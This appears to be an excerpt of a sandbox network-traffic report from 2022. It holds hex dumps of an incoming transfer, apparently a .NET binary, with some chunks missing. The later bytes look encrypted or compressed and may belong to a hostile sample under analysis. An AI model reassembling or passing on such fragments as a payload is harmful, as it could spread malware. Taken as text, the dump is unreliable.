                                                  2022-04-23 06:13:01 UTC20INData Raw: 01 c9 00 1c 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00 00 7e 70 01 c3 00
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~ ~p
                                                  2022-04-23 06:13:01 UTC21INData Raw: 00 74 38 01 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6 00 00 00 00 00 00
                                                  Data Ascii: t86 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(14
                                                  2022-04-23 06:13:01 UTC22INData Raw: 00 03 00 00 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d 88 18 86 00 03 00
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:13:01 UTC24INData Raw: 20 20 93 00 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28 01 5c 0d d9 01 c6
                                                  Data Ascii: ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(\
                                                  2022-04-23 06:13:01 UTC25INData Raw: 00 01 00 9d 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 89 0c 27 00 06 02 69 0c 20 00 06 02
                                                  Data Ascii: )' nV)V'V V "pln )' ' !wI"pln)' ) 'm s 3pln)'i
                                                  2022-04-23 06:13:01 UTC26INData Raw: 00 0c 9c 00 00 01 80 00 b6 00 6c 01 65 00 00 0c 9a 00 00 01 05 00 b2 00 6c 01 65 00 00 0c 70 00 00 01 05 00 ae 00 6c 01 65 00 00 0c 6e 00 00 01 05 00 aa 00 6c 01 65 00 00 0c 6c 00 00 01 05 00 a6 00 6c 01 65 00 00 0c 77 00 00 01 05 00 a2 00 6c 01 65 00 00 0c 29 00 00 01 05 00 9e 00 6c 01 65 00 00 0c 49 00 00 01 05 00 9a 00 6c 01 65 00 00 0c 27 00 00 01 05 00 96 00 6c 01 65 00 00 0c 22 00 00 01 05 00 92 00 6c 01 65 00 00 0c 20 00 00 01 05 00 91 00 62 01 79 00 00 0c 95 00 10 01 80 00 88 00 5e 00 30 00 00 0c 90 00 10 01 00 00 84 00 5e 01 79 00 00 0c 8b 00 10 01 80 00 82 00 5d 01 79 00 00 0c 86 00 10 01 80 00 82 00 58 00 cd 00 00 0c 81 00 00 01 00 00 81 00 58 01 79 00 00 0c 7c 00 10 01 80 00 80 00 58 01 79 00 00 0c 77 00 10 01 80 00 7f 00 58 00 00 00 00 0c 29
                                                  Data Ascii: leleplenlellewle)leIle'le"le by^0^y]yXXy|XywX)
                                                  2022-04-23 06:13:01 UTC28INData Raw: 05 33 05 9e 00 06 05 33 05 94 00 06 05 33 05 86 00 06 05 33 05 7c 00 06 05 4d 05 71 00 0e 05 4d 05 63 00 0e 05 4d 05 3d 00 0e 05 33 05 24 00 06 00 35 05 18 00 06 00 35 05 0b 00 06 04 f6 04 ea 00 06 00 35 04 e7 00 06 00 35 04 dd 00 06 00 00 04 cf 00 d3 00 35 04 c3 00 06 00 35 04 be 00 06 00 26 04 b9 00 0a 00 26 04 af 00 0a 00 35 04 a8 00 06 03 d7 04 9e 00 0e 03 d7 04 93 00 06 03 d7 04 88 00 06 03 d7 04 75 00 0e 03 d7 04 64 00 0e 03 d7 04 4c 00 0e 03 d7 04 3e 00 0e 03 d7 04 36 00 0e 03 d7 04 19 00 06 03 d7 04 01 00 06 03 d7 03 ea 00 06 03 d7 03 bc 00 06 00 35 03 b3 00 06 00 35 03 aa 00 06 00 35 03 a2 00 06 03 8c 03 7d 00 0e 03 5e 03 4a 00 0e 03 14 03 33 00 06 03 14 03 27 00 06 03 14 03 08 00 06 02 b6 03 01 00 06 02 b6 02 ed 00 06 02 b6 02 df 00 06 02 b6 02
                                                  Data Ascii: 3333|MqMcM=3$555555&&5udL>6555}^J3'
                                                  2022-04-23 06:13:01 UTC29INData Raw: 63 20 0c 87 9a ac c5 0f 1d 85 2a 5d 6d a9 93 55 f2 30 c8 15 29 db 13 07 85 2a 5d 71 68 2a 36 07 15 53 7b 6e 85 d8 cc 85 2a 52 80 95 6c db 40 a8 9f 70 fa d5 ad 6d dc 6f 93 0d 79 04 3f b1 4a 74 65 de af 18 13 60 5e af f1 e4 33 ca af 4d 52 bf f0 69 e6 80 ae ac 41 34 7d 85 2a 52 9a 33 d0 90 44 8e 85 2a 52 c1 bd 69 59 14 85 2a 52 ca 48 8f 83 df d2 d1 f9 65 32 85 86 c5 df 4d 59 76 bb 78 93 fb 9e 28 09 36 95 10 05 20 7b 85 2a 52 f6 8b 05 ff d3 c3 5d 33 11 51 59 c3 5c 15 ac b3 50 16 4a ce 01 0d 85 2a 52 17 eb cf e0 30 0e 97 98 c4 ea 98 b7 09 44 cc fb e2 88 3c f4 20 6a c0 1a c5 0a 85 2a 52 34 5a 6b 71 8e a2 dd 19 a2 df f4 7e bf 4c 39 bb 63 42 38 34 88 12 b0 4f e5 1d 21 e8 9f 90 00 b9 4c a6 85 2a 52 59 67 fb 12 2d bd 3b cb e1 85 2a 52 56 b4 fb f2 21 61 aa 59 9d aa
                                                  Data Ascii: c *]mU0)*]qh*6S{n*Rl@pmoy?Jte`^3MRiA4}*R3D*RiY*RHe2MYvx(6 {*R]3QY\PJ*R0D< j*R4Zkq~L9cB84O!L*RYg-;*RV!aY
                                                  2022-04-23 06:13:01 UTC30INData Raw: bc c2 85 2a 57 a4 0e a6 4d b8 85 2a 57 c5 7a 63 3d 50 fe 8d 1d 90 49 ef 4c cc 41 ef 3f 85 2a 57 db 6b 8d 97 bd 29 83 f9 51 bb 51 85 2a 57 e2 e7 64 c1 b4 81 22 a4 ab a9 13 49 6e de 00 14 16 1d c2 10 15 c4 0d d3 f0 e0 04 6c e1 ee 5f 02 85 2a 57 14 f4 fb dc c6 90 b9 cd 42 da 58 ec 1b a8 a2 64 a5 15 2f ef f2 0f dc d0 60 2a 1d 80 85 2a 57 3f 57 66 f9 dc ba b7 f8 d6 dd 3e 39 85 2a 57 3e 65 32 50 91 fd 21 14 85 2a 57 45 a4 a9 cb 51 ee bc 61 85 2a 57 48 c9 cf 74 5b 70 c1 98 bf aa 3d 70 1e ef 31 85 2a 57 55 26 99 9a 4a 63 85 2a 57 65 a0 f9 dd ad 1f 0d 84 d0 2c 85 2a 57 72 e4 93 35 fd 4b 16 6a 59 11 b5 1a fd e1 a9 ec e8 b9 c6 11 38 a0 68 92 42 85 2a 54 85 f3 6d 6b 0f b3 49 4a 8b 8c e0 31 a9 bc 5c dc ba 57 69 20 8f 8c 00 df 7e 26 70 c7 7a 85 47 66 85 2a 54 af 57 d5
                                                  Data Ascii: *WM*Wzc=PILA?*Wk)QQ*Wd"Inl_*WBXd/`**W?Wf>9*W>e2P!*WEQa*WHt[p=p1*WU&Jc*We,*Wr5KjY8hB*TmkIJ1\Wi ~&pzGf*TW
                                                  2022-04-23 06:13:01 UTC31INData Raw: e8 0c 98 98 38 dc 48 38 98 7c e8 dc 7c 98 0c 48 e8 0c 98 98 38 dc 48 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd 15 b5 51 c5 f1 51 b5 21 65 c5 21 b5 b5 15 f1 65 15 b5 51 c5 f1 51 86 c1 65 c5 21 b9 b5 10 d1 65 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 66 82 16 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 26 a2 16 3c 46 5d c9 fd 5d b9 41 05 ad 03 dc dc 6b 92 0a 6a d4 5d a7 94 3c f4 41 05 8d 5f d6 fa 46 fd 69 ea 4a ae 3a 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a ea 4f 8d fa 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a 8c 2c c8 5c 68 c8 2c b8
                                                  Data Ascii: 8H8||H8HwCwCwCwC__/k/k__/k/k}I}I}I}IQQ!e!eQQe!ef""RRff""RR&<F]]Akj]<A_FiJ:J:JJOJ:JJ,\h,
                                                  2022-04-23 06:13:01 UTC33INData Raw: 4c ed c3 ec 3b 72 8a a0 71 06 b6 7b 39 59 c2 fe 65 f9 4a fd 9d e1 c6 f5 e1 a1 37 52 b1 37 df 7f e2 65 b7 59 35 7c b0 39 a5 74 1e c6 07 80 23 41 d9 02 6f f9 2e 50 6f 0c 03 32 5d 8f d1 62 1f be 39 2a 50 53 2d 41 e0 35 81 9b cd 10 19 eb f9 0d 63 03 e0 07 6f 26 c8 c1 d6 e0 b6 70 3b 68 47 4a a7 eb 91 f8 f1 31 4f a1 ab 01 b7 25 d0 ec cb cb a7 b9 9b 91 b5 2d 80 96 5a 13 d8 1e 5d 6d 96 44 e8 5c 48 39 56 fb 91 26 5c 2b 46 2c 85 9c 59 a8 6c b6 68 22 79 fb 55 7c c8 44 b1 71 c7 47 15 3e 8e 98 f4 bd e1 b5 9c f9 51 a4 4a c9 f5 7a 8a 9f 78 99 be 19 fd bc e2 27 a6 ef 78 15 63 fd 50 b9 34 c5 e5 99 3c 2f 81 4a 26 9d 4b 3f 3d ca 7d fa e8 d0 4b 51 53 a6 5f 8b 70 51 8f 34 bd 3b d3 56 3f bd 76 78 d1 32 e3 14 aa ec 05 66 7a 89 7c aa 4a 79 73 e1 d1 f6 1e 62 30 a1 90 1e b8 d3 f2
                                                  Data Ascii: L;rq{9YeJ7R7eY5|9t#Ao.Po2]b9*PS-A5co&p;hGJ1O%-Z]mD\H9V&\+F,Ylh"yU|DqG>QJzx'xcP4</J&K?=}KQS_pQ4;V?vx2fz|Jysb0
                                                  2022-04-23 06:13:01 UTC34INData Raw: 4a bc e4 1f e8 29 11 a1 6d 07 61 77 cc 0d 29 80 6b 0e b6 e8 5b 48 5f a0 72 fd c9 36 9a a4 2a 96 57 85 c2 a2 79 a5 f1 6d 4a 40 6e 92 fd 98 1d 88 b3 cc b9 64 51 37 44 18 21 fa 64 d2 4d 2e 09 0b 05 97 2c f0 e7 ae 38 7a ff ed 3b f2 35 e2 c5 9f 11 fb 72 66 14 cc 4d 16 44 82 76 68 52 5e 23 f0 72 01 90 c3 60 24 36 cb c7 e2 27 41 58 3b 41 28 83 e0 47 b6 d7 46 a1 1d 72 c1 6d 4d 8d 0c df 95 03 78 63 cc 93 56 e1 b2 20 65 dd 50 42 58 3f 0d a2 89 b9 d0 fa 42 e2 64 50 98 94 9b a4 cd 8c f0 9a 49 05 f3 0a e8 3d 85 21 46 42 d5 da ae b3 8b ed 1c bf 13 63 99 1f b7 c4 2b 19 b4 b6 98 70 3d 44 34 76 68 00 b3 c0 11 9a 18 1c 72 b7 fc 71 58 da 68 49 ec 62 aa a9 72 2b 08 3b d1 5b 8f 91 5b 51 78 76 bf fb bc ee 77 1e 82 15 dd 9d 6e 5e 40 fc 40 c3 93 17 d6 c9 dd 7a 38 da 8f 6b 7f 11
                                                  Data Ascii: J)maw)k[H_r6*WymJ@ndQ7D!dM.,8z;5rfMDvhR^#r`$6'AX;A(GFrmMxcV ePBX?BdPI=!FBc+p=D4vhrqXhIbr+;[[Qxvwn^@@z8k
                                                  2022-04-23 06:13:01 UTC35INData Raw: ff fa ef 10 c2 d5 af 03 e3 7f c3 a8 68 64 b4 19 4d 2d 53 96 35 24 8f 66 0a a3 27 8d de 0f 96 0f 73 74 71 ee 03 af e0 74 cb b4 b6 c6 d5 a6 6b d3 13 c0 04 01 4d fb a8 9b 0b cd 20 b8 c6 f2 b2 a2 13 ca 7f df d2 32 bd 90 7d 65 28 1b a2 05 09 ad f1 69 b4 ba 69 2f 74 b0 a8 30 37 7d 6d eb be d3 f6 0e 6f 84 9f c8 04 61 b2 0a 84 3d 73 f1 c0 79 d8 50 6b 36 19 bc 68 af 7f 99 1f 8a 74 97 e1 35 45 cd 5e 2e 7b be fb 2c 38 c3 a0 be 55 de 10 ca 9b 8b 65 40 24 03 cd bc 8f 52 5d b1 40 e0 87 bf a8 b7 d1 80 aa 75 94 99 07 c4 8a e1 e8 f4 9b a0 f7 96 b7 a9 c5 cc bd c7 6a 8d cd cf 7b 9b fa f4 f6 ed cd b7 b1 fa 31 f1 94 90 d7 03 38 e7 23 d5 25 54 1b 68 16 b6 0a ee 61 61 e1 1e 58 8c fd 30 1d 59 46 4a fd 48 49 2b 9e f2 71 41 71 b8 20 4c 92 c0 44 31 55 e9 f9 bc ea 5b 8a be 5d 30 ac
                                                  Data Ascii: hdM-S5$f'stqtkM 2}e(ii/t07}moa=syPk6ht5E^.{,8Ue@$R]@uj{18#%ThaaX0YFJHI+qAq LD1U[]0
                                                  2022-04-23 06:13:01 UTC37INData Raw: 1c 77 85 6b 8a 12 25 9d 33 61 5d 14 c7 46 ca aa 38 a2 0c d7 bb f1 e2 dc 3a 70 d6 15 fd a8 0c e4 77 bf 00 0b 66 ac 26 75 50 6a 19 e6 02 51 fb 16 bc 6a 2e be f6 95 98 97 3a 37 68 fb 47 d8 1d 96 f6 7a 62 f5 2e 49 6c 05 27 10 46 c4 cd 07 07 63 cf db a1 0a 46 9e 4f be 87 e8 f2 e5 eb d9 73 7b d1 df 1d 39 f7 28 21 af 15 84 40 fd ec 9c 8c bc bc 52 e9 4e 10 93 d5 39 a1 f4 ba f9 03 24 21 e5 66 0a 46 35 f2 0a 17 24 94 d6 7b 0a 0b 65 b2 44 44 81 d7 46 19 d2 0a 6c be 8a cf 4c 89 be fb a7 ef 7a 22 90 ec 0f 8b d1 57 14 d4 e0 96 5e 4e 58 0e 9b 12 91 ac 49 c5 55 4a 1c 63 13 7a a2 ee 38 4b 87 18 f7 2a d5 53 0a 22 b7 03 7b a5 eb c7 61 8d 87 60 84 1a ff 72 66 d2 54 f4 c0 db 88 ad 42 1e b5 1d 3d e4 60 3b 77 51 b7 db 5f ec 7b 9d 55 f7 80 88 eb 6f c6 1d 31 d9 61 b7 00 5d a6 51
                                                  Data Ascii: wk%3a]F8:pwf&uPjQj.:7hGzb.Il'FcFOs{9(!@RN9$!fF5${eDDFlLz"W^NXIUJcz8K*S"{a`rfTB=`;wQ_{Uo1a]Q
                                                  2022-04-23 06:13:01 UTC38INData Raw: 9e 5a 4e 65 c8 41 14 15 bc 6c 5b 8e 6b 86 df 1e da e5 de 0f 00 f7 0a ed 54 2f 83 5d 2f fd a9 1b 82 70 99 3e 60 7b 07 29 bf 04 dd c0 66 c6 3d bc 13 f3 20 1d 9c 24 99 c1 7e 9c 5e 0b f5 3f e4 23 a3 72 83 e8 56 43 79 88 6e da 0e 7a 20 b4 d6 4b 5d e7 ca 6d 41 97 67 04 36 d7 31 1f 2f 9a 84 e8 9a 48 03 a7 f8 ae 5a 09 7b 26 3c 30 50 cf 25 27 b0 e5 1a 83 a8 3f 00 6b 09 7f 5a 89 22 f5 2c 32 ee 8b 4a 6c 54 55 03 3f 25 6b f7 2d b8 b3 48 ac 78 0f 59 2b 38 47 3c 9f f4 0d 50 77 eb 95 a8 f4 1c 59 50 a0 83 8b fe 91 7b 2b 90 a2 66 47 02 b1 d8 fc 2f 50 c9 36 2f 6b f1 e7 f4 e0 04 46 ca e3 ab 26 9b be 87 49 c9 a9 f1 5d 15 b4 65 ef 89 07 e3 d9 20 87 46 bc c3 4a 74 70 84 36 65 cb d6 0f 2d 39 ae e3 46 6f 50 0f 6c de 00 ef b8 2e cd cb 5a c8 6a 42 f0 68 e0 47 58 be 39 15 e1 01 bb
                                                  Data Ascii: ZNeAl[kT/]/p>`{)f= $~^?#rVCynz K]mAg61/HZ{&<0P%'?kZ",2JlTU?%k-HxY+8G<PwYP{+fG/P6/kF&I]e FJtp6e-9FoPl.ZjBhGX9
                                                  2022-04-23 06:13:01 UTC39INData Raw: 70 e8 23 59 7c 16 e5 b9 7b 5a 68 81 f8 38 d3 1d 7a 1f 04 53 67 fa bb a0 73 cb de 85 8c e7 cd db 38 ef a5 47 0f ae 0a 41 72 84 17 6b d9 c0 f9 2b 0b 7b 6f 8c 8f 82 fb 84 a8 ce 57 63 f9 64 b5 9d 6b e0 f6 34 98 4b e7 8a aa 32 d6 ea 8d 19 d2 25 5b 1a 7d 7e d4 51 1c 4b 76 a5 cd 16 f2 98 f7 c1 a5 5e 0e 54 de 4f e9 bd cb 44 1a 0d 52 35 7d 0c d4 38 d2 11 d8 6f 46 8d 2c 87 91 b6 b7 a0 80 8b 9a 54 53 ff 42 0f 5e 17 1c 97 99 81 e5 8c c2 77 fb 1e 05 86 c0 c3 40 fd d7 66 ba 8b b5 e6 06 ce 4f 68 7f a2 42 85 6f 55 ec 25 ae 9e 13 a5 fc 0a e2 a6 dc d1 9b d6 da 1d 74 47 27 33 9b b9 b8 f7 1b 69 e7 7c ca 21 37 68 f1 5c b3 47 5f 32 7d 8f 5c 2c c2 aa 03 a6 9e 4e 4b ed 75 00 fd 35 1b ec 9e 19 18 a9 7e 4a 96 17 b8 4c 4a df 20 6c 96 c0 83 73 c8 1f 9d 97 6c a2 5d 21 bd 8c 77 25 44
                                                  Data Ascii: p#Y|{Zh8zSgs8GArk+{oWcdk4K2%[}~QKv^TODR5}8oF,TSB^w@fOhBoU%tG'3i|!7h\G_2}\,NKu5~JLJ lsl]!w%D
                                                  2022-04-23 06:13:01 UTC41INData Raw: fe 93 e8 06 8c e7 ec b9 7c d6 2c d2 15 80 cd de ce 26 93 0c 40 b2 03 a9 6c e3 57 f9 df a7 a2 14 ee bf 58 4e ce 81 f2 1c 59 f2 28 a9 8b 9b 93 3f 94 a1 e9 fc 42 1c cc cf b5 60 05 6d ae 5b f7 19 a8 b8 5c 1f 7f b6 06 be ec 04 46 e8 c8 ba 30 a7 6b 6f f3 d9 8d 55 1b 31 78 b7 84 08 59 43 28 95 21 54 0a 33 37 97 81 4b e7 74 ad e6 8f 53 ba a1 18 2e 9c 5f f1 26 bb 04 7f d6 4b 84 04 3e f1 9c 2d ea 30 26 51 9d b6 a2 dd ea 47 0c f4 73 90 a6 51 6a 0d c5 50 23 fa a4 4a 83 e2 47 dd 41 48 45 81 9b e7 73 29 4e 36 0c dc 40 ef bc b6 b3 68 ea fd 53 c9 2f dc 7b d1 14 e2 ce fe 32 ee 0c a8 1e 81 7c 38 bf 5d 02 cc 30 16 36 01 e0 53 d8 cc f7 2d a1 94 d4 c0 21 e2 c2 a7 1d c6 5f 5b 42 8f 40 43 79 c3 38 ca 7a 15 50 cd e3 e7 25 2f d3 47 b3 fe e2 75 9d 5a 85 ad 55 d6 60 29 7b 9e 96 f0
                                                  Data Ascii: |,&@lWXNY(?B`m[\F0koU1xYC(!T37KtS._&K>-0&QGsQjP#JGAHEs)N6@hS/{2|8]06S-!_[B@Cy8zP%/GuZU`){
                                                  2022-04-23 06:13:01 UTC42INData Raw: 7f ed 71 46 8b 6e 43 1e 05 a6 9b 28 00 06 28 cb 94 d3 55 cc d2 ed ba 99 72 50 e6 87 6e fa be f2 da b5 13 d2 9a 93 cd 05 71 fb b4 0b f0 c0 d2 c4 78 69 87 8d 63 ff 89 d8 48 74 ad a5 a5 a7 85 a3 d1 8c 2b 7c 09 e8 7c b1 3b d0 a9 e6 c6 90 67 1e 1d c6 ce a0 e8 30 b3 6f b8 4b 06 1b e8 0e 09 ed 5e 08 a9 3b e5 3f 02 65 d0 ba ac 53 6f ea cc ed d6 08 86 4a 76 d9 1b 2b dc d0 0f fa e7 36 2a ae 30 75 20 24 9f 7e 62 96 5c 18 7a fe 40 d4 98 ad bf e5 7c 72 b1 80 1b 7c 19 27 c7 6c 34 11 a4 6f fc a4 af 89 a3 4f 5d eb 2a 09 2f 6c 39 29 4f b2 ec c3 cc 95 ee 76 64 dc e1 62 4c cb e5 e8 a0 5b 06 dc 0f 19 96 0f f1 ab 88 ec 21 40 3c 53 70 5e 38 14 75 00 70 65 64 93 6c 5f ad eb 74 94 8f b1 60 87 ab 80 5d 3f fa f0 d5 9c e8 22 8f 36 2f ff 7a 17 48 05 2f e2 62 b9 19 ca b9 7e e9 d3 a4
                                                  Data Ascii: qFnC((UrPnqxicHt+||;g0oK^;?eSoJv+6*0u $~b\z@|r|'l4oO]*/l9)OvdbL[!@<Sp^8upedl_t`]?"6/zH/b~
                                                  2022-04-23 06:13:01 UTC43INData Raw: 82 90 cc a6 ee c7 22 84 bd b1 5a db a4 97 1c 95 d0 92 d6 0f c4 b4 00 4d db 96 ce b7 3b 14 bb c0 96 f2 d3 d9 bf 94 a3 9e 63 6a d7 d8 8a 2c 84 67 36 8b 11 9f 77 fe 95 d9 62 59 bb 3f 60 29 c7 3d 23 e7 98 3f d0 88 5b de d2 4b 90 ca 5a dc 60 53 48 66 ac 4e 62 ef 58 85 01 df 76 b4 9f ae a5 92 d7 c5 33 bf e9 d9 cb a9 c4 5b 3f a0 2c c3 a2 73 23 31 4a f5 1c d9 43 49 a7 94 9d fa f4 8f 66 e9 d5 36 a9 ec ec 2b 5b 49 d8 ff ba 7a 14 9c bd 87 60 a7 b8 8f fe ea d7 95 b9 a7 c0 ce 7e ea 07 33 8d 57 e6 fc 8f d0 17 1d a9 a4 82 12 c3 ab df 2d 11 28 19 06 14 7c db f9 0f ba f7 d5 7e d7 3f 26 44 9b 48 e8 5d fb 64 13 14 24 94 27 00 2e 7d 5b a5 10 72 5d e5 62 e4 6d 5d b8 38 1c 6a 9f ec bf e0 a5 e1 36 9d 77 c5 75 dc ea fd 57 ff 3d 3f 73 db 8a cf 75 13 1a ff 65 52 6b 29 a8 f4 78 b4
                                                  Data Ascii: "ZM;cj,g6wbY?`)=#?[KZ`SHfNbXv3[?,s#1JCIf6+[Iz`~3W-(|~?&DH]d$'.}[r]bm]8j6wuW=?sueRk)x
                                                  2022-04-23 06:13:01 UTC45INData Raw: 85 61 2c 4b e5 57 e1 d5 f6 ec 12 7b 24 70 ee 86 96 b0 3b 73 dd 4a 9b bb 38 b6 9e 9b 4e c5 3a 01 ff cb 7a 16 2b 62 98 70 74 d6 db f4 9f 8a 4e 06 8f 29 05 e8 05 89 9b c0 6f a8 3a 95 3b 65 b4 35 f2 fa 25 1e 54 ca 43 04 b9 cb 2e ec 9c 42 aa 57 9d 82 c3 cd e6 98 c5 9c 47 bc af 02 81 ba d1 78 05 02 d0 ee e4 95 14 aa 28 c8 b3 07 1f 8c bc 14 90 bf 33 21 b9 d6 c9 fb 8f 4c 9f a3 79 df ff 90 9a 48 c8 35 b5 3a 58 c6 19 fa 87 ad b3 3d 02 8b 29 ab fb c8 e0 86 56 0e f2 59 ad be 77 2d 9d 96 e0 27 36 f6 fa 1d b6 f2 cf 37 39 ca 98 2d 60 ee ec 88 56 a0 2d b7 91 4d 12 c6 8f 04 ff 83 0a d5 69 19 38 ca db c1 f8 8d 18 19 1b 3b 61 c2 75 41 b6 37 d6 f1 95 02 22 62 f0 68 90 bf 8b 4c c7 15 a7 86 90 29 56 8c 3b 50 91 e4 eb c8 03 e8 1b 66 73 80 ee 36 70 99 ad b7 f0 89 7a 74 8a 61 e9
                                                  Data Ascii: a,KW{$p;sJ8N:z+bptN)o:;e5%TC.BWGx(3!LyH5:X=)VYw-'679-`V-Mi8;auA7"bhL)V;Pfs6pzta
                                                  2022-04-23 06:13:01 UTC46INData Raw: 92 89 98 35 f7 3b 0c af cc f9 c2 e8 d3 70 b8 6d ec 3c 04 f3 e8 66 b7 65 b6 af 1a 8d a7 11 e9 24 ce d7 0e 73 9d b6 72 d9 a6 25 22 d5 5b 0f 84 4f 2c fb 95 9f 49 13 3c 2b 29 72 16 a6 98 74 f6 e6 06 c1 c0 c7 e5 38 d8 21 1d 3b 7b 3e b2 8d ae 03 f7 1e 23 3e 8b 3d 54 86 27 ff e9 c3 14 3a ee 81 7e 68 64 af fe ae 70 ba 6f 18 da 0e 7f 17 22 77 eb 17 3e 2e 76 34 89 33 be 44 d6 a4 9c 8e bc 92 e1 94 0e 38 df a1 65 58 e6 dc cf 49 7e bd 2b 06 77 4b 7f b4 89 cc 95 f1 ee b0 e9 1b 63 c7 cc 71 60 fd db 65 53 af 3a c3 ac 20 72 e5 9f 52 1e a2 33 83 22 4a 1f 68 2a 1a 93 bd 3c 3e 65 6c 78 26 b9 99 de 74 c1 32 01 43 49 4c fc f2 b0 31 a2 fa d1 70 f6 db 43 39 e7 fe 1e 78 94 ee 9d 1a 93 38 9f a5 d3 38 78 b3 e3 7b d6 1b 0c ee 6d fc 76 a7 e6 69 9c 7b 4c 12 67 ce d9 5e 93 e1 b5 0b 